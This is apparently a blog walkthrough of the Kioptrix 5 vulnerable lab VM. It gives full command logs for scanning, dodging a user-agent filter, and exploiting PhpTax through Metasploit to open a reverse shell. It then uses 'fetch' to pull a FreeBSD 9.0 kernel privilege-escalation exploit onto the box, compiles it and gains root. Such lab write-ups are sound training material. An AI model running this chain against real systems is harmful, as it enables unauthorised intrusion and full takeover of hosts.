Saturday, October 4, 2014

Kioptrix 5: SOLUTION

I had some time this week and wanted to work on a vulnerable machine challenge. A while ago I had enjoyed working through the Kioptrix VMs but had never gotten a chance to work on the one released in 2014. So I decided that would be an excellent exercise for the evening. SPOILER ALERT: The rest of this post will provide a solution to this challenge.

First, it is worth mentioning that I had to remove and re-add the network card in order for the VM to grab an ip address. This is also mentioned on the Kioptrix VM blog.

My Setup:
Kali: 192.168.138.129
Kioptrix 5: 192.168.138.130


So we start with a good old fashion nmap scan. 
 
root@kali:~# nmap -sV 192.168.138.130
Starting Nmap 6.46 ( http://nmap.org ) at 2014-09-08 21:57 EDT
Nmap scan report for 192.168.138.130
Host is up (0.00031s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:3C:ED:6C (VMware)
So we notice what looks like a standard web server running, So time to navigate to the webpage and see what we got. Lets start with standard port 80.

Well that is rather disappointing! I was hoping for some type of login or input box. Lets check 8080.

That was more interesting but not very exciting either. Lets move to one of my favorite web scanners Nikto and scan both sites. 
 
root@kali ~# nikto -h 192.168.138.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.138.130
+ Target Hostname:    192.168.138.130
+ Target Port:        80
+ Start Time:         2014-09-08 22:00:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST



root@kali ~# nikto -h 192.168.138.130:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.138.130
+ Target Hostname:    192.168.138.130
+ Target Port:        8080
+ Start Time:         2014-09-08 22:45:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ All CGI directories 'found', use '-C none' to test none
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 22376 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-09-08 22:49:51 (GMT-4) (244 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
At first look there appears to be a possibility with CVE-2002-0082, OSVDB-756. Also a flashback to Kioptrix 1. But after some investigating you will find these exploits will not work here. Bummer. As I often do when Im working through a test like this, I went back and ran the same scans again. They all produced the same results as expected, however this time it caught my attention how long they were taking to run. Nikto is a very fast scanner and this is on an isolated network, yet these scans were taken a very long time to execute to run. Why? What if the scan is getting filtered? Nikto identifies itself in the user agent field when scanning and this is a configurable field. Lets try and change it. This took some time, however I ran the same test with several different user agents until BINGO found something different! I used useragentstrings.com to get a list of user agents to try. Check the results below when I used an IE6 user agent string on 8080: 
nikto.conf
....
# User-Agent variables:
 # @VERSION     - Nikto version
 # @TESTID      - Test identifier
 # @EVASIONS    - List of active evasions
#USERAGENT=Mozilla/5.00 (Nikto/@VERSION) (Evasions:@EVASIONS) (Test:@TESTID)
USERAGENT=Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

...

root@kali:~# nikto -h http://192.168.138.130:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.138.130
+ Target Hostname:    192.168.138.130
+ Target Port:        8080
+ Start Time:         2014-09-09 19:02:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-3268: /: Directory indexing found.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.4.26)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /./: Directory indexing found.
+ OSVDB-3268: /?mod=node&nid=some_thing&op=view: Directory indexing found.
+ OSVDB-3268: /?mod=some_thing&op=browse: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /?Open: Directory indexing found.
+ OSVDB-3268: /?OpenServer: Directory indexing found.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: /?mod=alert(document.cookie)&op=browse: Directory indexing found.
+ OSVDB-3268: /?sql_debug=1: Directory indexing found.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-3268: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /?PageServices: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ OSVDB-3268: /?wp-cs-dump: Directory indexing found.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when   /'s are requested.
+ OSVDB-3268: /?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3268: /?D=A: Directory indexing found.
+ OSVDB-3268: /?N=D: Directory indexing found.
+ OSVDB-3268: /?S=A: Directory indexing found.
+ OSVDB-3268: /?M=A: Directory indexing found.
+ OSVDB-3268: /?\">alert('Vulnerable');: Directory indexing found.
+ OSVDB-3268: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: Directory indexing found.
+ OSVDB-3268: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?&cmd=ls: Directory indexing found.
+ OSVDB-3268: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?&cmd=ls: Directory indexing found.
+ OSVDB-3268: /?show=http://cirt.net/rfiinc.txt??: Directory indexing found.
+ OSVDB-3268: /?-s: Directory indexing found.
+ OSVDB-3268: /?q[]=x: Directory indexing found.
+ 7356 requests: 0 error(s) and 44 item(s) reported on remote host
+ End Time:           2014-09-09 19:04:01 (GMT-4) (113 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Now we are getting somewhere! Looks like there is more to this website than meets the eye. Now lets navigate to the website using user agent switcher plugin for iceweasel.

Interesting we have a new directory to look at. When you click on it you find a webapp.
Now I had never heard of "phptax" so my first instinct was to run it through searchsploit. 
root@kali:/var/www# searchsploit phptax
...
phptax 0.8 - Remote Code Execution Vulnerability                                                                                                      | /php/webapps/21665.txt
PhpTax pfilez Parameter Exec Remote Code Injection                                                                                                    | /php/webapps/21833.rb
PhpTax 0.8 - File Manipulation(newvalue                                                                                                               | /php/webapps/25849.txt

Sure enough, looks like there is remote code execution. Upon looking at the ruby file, it appears there is aleady a metasploit module! Even better. Time to switch over to metasploit. After some small configuration BAM we got a shell! 
msf payload(reverse_tcp) > use exploit/multi/http/phptax_exec 
msf exploit(phptax_exec) > show options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST      192.168.138.130  yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8


msf exploit(phptax_exec) > exploit

[*] 192.168.138.1308080 - Sending request...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Iam34x4WAqVYQ4PL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo jIkHJaahsxxiLarm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Iam34x4WAqVYQ4PL\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "jIkHJaahsxxiLarm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.138.129:4444 -> 192.168.138.130:57006) at 2014-09-09 21:20:00 -0400
[*] Command shell session 2 opened (192.168.138.129:4444 -> 192.168.138.130:28179) at 2014-09-09 21:20:00 -0400

ls
data
drawimage.php
files
icons.inc
index.php
maps
pictures
readme
ttf
whoami
www

Now we are on the box, but not root. Time todo some recon on the box. 
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

FreeBSD 9, ok back to searchsploit. I get alot of results, but one in particular interested me, 28718. 
root@kali ~# searchsploit freebsd 9
....
FreeBSD 9.1 ftpd Remote Denial of Service    | /freebsd/dos/24450.txt
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escl | /freebsd/local/26368.c
FreeBSD 9 Address Space Manipulation Privile | /freebsd/local/26454.rb
FreeBSD 9.0 - Intel SYSRET Kernel Privilege  | /freebsd/local/28718.c
FreeBSD <= 7.1 libc Berkley DB Interface Uni | /freebsd/local/32946.c
....

So great there is a local privilege escalation, but that means we need to get the exploit onto the box and be able to compile it. Doing some more poking around I am able to determine, I have gcc, and can write to the directory I am currently in, however how am I going to get the file there? My first thought is web server, however I don't seem to have wget or curl. A quick Google search revealed a command called "fetch" on freeBSD that would accomplish the same thing. So I hosted the exploit on Kali's web server and used fetch to pull it down. 
fetch http://192.168.138.129/28718.c
28718.c                                               5565  B   31 MBps
ls
28718.c
data
drawimage.php
files
icons.inc
index.php
maps
pictures
readme
testfile
ttf

Now time to compile, run and hope that it works. 
gcc 28718.c -o sploit
ls
28718.c
data
drawimage.php
exploit.php
files
icons.inc
index.php
maps
pictures
readme
sploit
testfile
ttf
./sploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
whoami
root

WOOT! The exploit worked and now we have root. Mission complete.
Posted by at 1 comment:
Subscribe to: Posts (Atom)